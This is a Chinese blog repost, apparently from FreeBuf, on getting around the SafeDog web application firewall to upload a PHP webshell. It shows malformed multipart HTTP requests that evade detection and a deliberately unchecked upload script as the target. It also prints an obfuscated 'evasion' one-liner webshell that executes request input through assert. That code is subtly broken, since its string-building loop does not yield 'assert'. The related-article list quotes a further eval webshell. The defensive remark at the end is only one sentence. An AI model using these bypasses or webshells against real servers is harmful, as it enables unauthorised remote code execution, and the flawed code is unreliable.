绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

最新推荐文章于 2024-09-08 01:44:48 发布
最新推荐文章于 2024-09-08 01:44:48 发布
阅读量5.8k 收藏 7
点赞数 1
分类专栏: ctf 文章标签: 绕过网站安全狗拦截 上传Webshell技巧 免杀PHP一句话

转载自:http://www.freebuf.com/articles/web/125084.html

*本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。

思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。

废话不多说,切入正题。。。。

1、实验环境:

Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048

2、用于文件上传的PHP源码:

 

<?php

$path = dirname(__FILE__) . '/upload/';

$rand = rand(0,30);

move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);

echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "<br/>";

echo "OK";

?>

因为此次实验的目的是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。

3、先看一下正常的HTTP请求:

QQ截图20170112105926.jpg

很明显,文件名为”yijuhua.php”被拦截。。。。

4、尝试%00截断:

QQ截图20170112110130.jpg

很明显,失败了。。。

5、修改HTTP请求,构造畸形HTTP请求

(1)删除实体里面的Conten-Type字段:

QQ截图20170112110308.jpgQQ截图20170112110403.jpg

 

 

绕过网站安全狗的拦截,成功上传WebShell。。。

(2)删除Content-Disposition字段里的空格:

QQ截图20170112110526.jpg

QQ截图20170112110634.jpgQQ截图20170112110904.jpg

(3)修改Content-Disposition字段值的大小写:

QQ截图20170112111451.jpg

6、菜刀连接一句话:

QQ截图20170112123418.jpg

到此,上传WebShell结束,各位看明白了吗?

7、免杀PHP一句话:

 

<?php

/*

PHP一句话木马

assert($string)

*/

$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i<count($arr);$i++) {

$func .= $func . $arr[$i];

}

$func($_REQUEST['c']);

?>

QQ截图20170112105346.jpg

8、修复漏洞:

出现这种情况,我认为是网站安全狗在开发时没有考虑到畸形HTTP请求,而Apache却兼容畸形HTTP请求,所以能够上传成功。

xuchen16
关注
专栏目录
PHP WebShell 免杀
悦分享
08-01 6251
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
WebShell 木马免杀过WAF
悦分享
08-02 676
什么是WAFWaf是web应用防火墙(WebApplicationFirewa‖l)的简称,对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,为web应用提供防护,也称作应用防火墙,是网络安全纵深防御体系里重要的一环。waf属于检测型及纠正型防御控制措施。waf分为硬件waf、软件waf(ModSecurity)、代码级waf。WAF的原理waf对请求的内容进行规则匹配、行为分析等识别出恶意行为,并执行相关动作,这些动作包括阻断、记录、告警等。...
2016最新aspx免杀webshell安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
安全狗绕过
alien0011的博客
06-09 3488
安全狗绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
php webshell免杀初探_2024最新php免杀大马
最新发布
2401_86640535的博客
09-08 493
前段时间上班无聊,刷公众号偶然发现一篇“”的文章,突然来了兴趣研究研究,找了曾哥的来看。自己做了几个样本,效果测试还不错,就放出来和大家交流,感觉基本够用。github下载:https://github.com/g1an123/php-webshell-bypass (点点star🌟)。截止2月6日。
php网站安全狗绕过,网站安全狗最新版绕过测试
weixin_33279554的博客
03-10 207
测试时间:2014.10.21测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最新版。用于绕过的核心字符:%0A,某些特殊场合需要和注释符配合使用。测试详细步骤:1、本机安装了存在注入的V5shop(构架为IIS6+ASPX+MSSQL2005,以测试IIS版本的安全狗),常规注入测试:Defaulthtt...
关于安全狗文件上传
weixin_33805557的博客
06-05 574
文章转载至科拉实验室,作者倾旋@科拉实验室 Part 1 分析 此文主要研究安全狗的数据包分析功能,由于很多人都认为安全狗是通过正则去匹配的,那么暂且那么说吧。这款应用层的WAF的确在测试中让人头大。那么安全狗是如何分析我们的数据的呢?在这里我做了一个拓扑图: Part 2 测试过程 测试系统:WINXP脚本语言:PHP5.4.45WEB服务器:Apache/2.4.23(Win...
安全狗php一句话,[WEB]绕过安全狗与360PHP一句话的编写
weixin_39835607的博客
03-12 198
狗确实是令人很头疼,特别是在是在发送一段话或是载入一段话的那时候,会被xX狗阻拦进而拿下不来shell。或许,安全狗是非常简单的这款waf,非常容易就开展1个绕开。针对绕开xX狗跟400,我姿态很少,可是却很好用为下列二种可变性自变量引证自变量可变性自变量(水果刀将会出错拷贝编码常常应用的人都了解,仅仅非常简单的一段话,只有一切waf与标准人们先來添加必须的涵数拷贝编码人们先來检测下是不是被杀能够...
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2497
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马的免杀Webshell检测方式网上有很多免杀一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
WEB渗透学习笔记7——webshell上传绕过
林林木林林L的博客
08-01 3398
webshell 概念 web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,WebShell是一种用来进行网站和服务器管理的脚本程序,webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传web服务器的页面的目录下,攻击者通过上传WebShell获得Web
一句话木马以及免杀
抚琴
01-08 3960
此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础 查杀软件我首先:D盾 『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了
绕过安全狗asp程序
06-06
可轻松绕过安全狗 突破安全狗拦截 本程序仅供研究
安全狗上传绕过+wbehshell免杀
09-05
服务器安全狗是一款集服务器安全防护和安全管理为一体的综合性服务器工具。支持Windows全系列操作系统(Windows2003/Windows2008/Windows2012 32位 64位)、Linux操作系统的服务器安全防护软件,从驱动层直接屏蔽攻击,保护服务器安全。自2011年推向市场后,迅速在服务器安全市场里占有一席之地。 这篇文档总结了一些安全狗上传绕过经验,供参考。
安全狗php一句话,.[WEB]绕过安全狗与360PHP一句话的编写
weixin_39623411的博客
03-12 219
来源;http://bbs.ichunqiu.com/thread-9012-1-1.html?from=ch00x01安全狗的确是让人很头痛,尤其是在上传一句话或者写入一句话的时候,会被安全狗拦截从而拿不下shell。当然,安全狗是最简单的一款waf,很容易就进行一个绕过。00x02对于绕过安全狗跟360,我姿势不多,但是却很实用为以下两种1.#可变变量2.#引用变量00x03##可变变量(菜刀...
突破安全狗
duan_qiao925的博客
06-05 872
实验准备 Sql注入原理:用户能控制输入并构造恶意参数(多为sql语句),Web应用执行的代码拼接了未加过滤的nei'rong。
绕过网站安全狗,方法 适合所有
chunyu9241的博客
07-14 611
无意间在网上看到一遍文章说是可以绕过狗的,具体如下 1.生成一个txt或者其他可读文本,然后将其包含在所运行的程序中,如 <?php eval($_POST[ssd]); ?> 命名为 1.txt 这时候 狗是不会太多的检测的,一般可以正常放入进去。 然后在相应...
安全狗 mysql暴力破解_记一次绕过安全狗的教育网站渗透
weixin_34221197的博客
02-05 511
作者:我想学安全来源:https://xz.aliyun.com/t/9025前言:此次渗透测试较为基础,有很多不足的地方,希望各位大佬能够指正首先打开学校的官网:http://www.xxxx.edu.cn嗯,直接干。。。这里直接进行子站查找,一般主站不会让你打进去的(大佬当我没说 ^..^),进行了一番查找,找到了一个学校的图书馆系统需要学号和密码, 学号一般通过谷歌语法来搜集就可以, 默认...
PHP一句话
weixin_34054866的博客
12-20 2491
<?php @eval($_POST[pp]);?> 这是一段PHP木马代码,也就是我们所说的后门程序 为什么说这段代码是后门程序? 其实这段代码属于基础类的一句话,功能仅限于验证漏洞了,实际中太容易被查出来了, 这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算 就这一句话害死人,这样任何人都可以post...
网站入侵检测之全方位突破安全狗
xysoul的专栏
05-03 4359
一、前言 安全狗是一款大家熟悉的服务器安全加固产品,据称已经拥有50W的用户量。 最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入、文件上传、防webshell等都可以被绕过,下面为大家一一介绍。 二、测试环境 本次测试环境为 中文版Win2003 SP2+PHP 5.3.28+Mysql 5.1.72 网站安全狗IIS版3.2.08417 三、SQL注
Webshell一句话攻击技巧PHP、ASP、JSP常见实现与防范
本文主要讨论了在Web开发中,如何利用不同服务器端脚本语言(如PHP、JSP、ASP等)实现一句话攻击(也称为“一句话木马”或“过狗”)来获取Webshell权限,以便通过像“菜刀”这样的工具进行远程控制。以下是关于这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值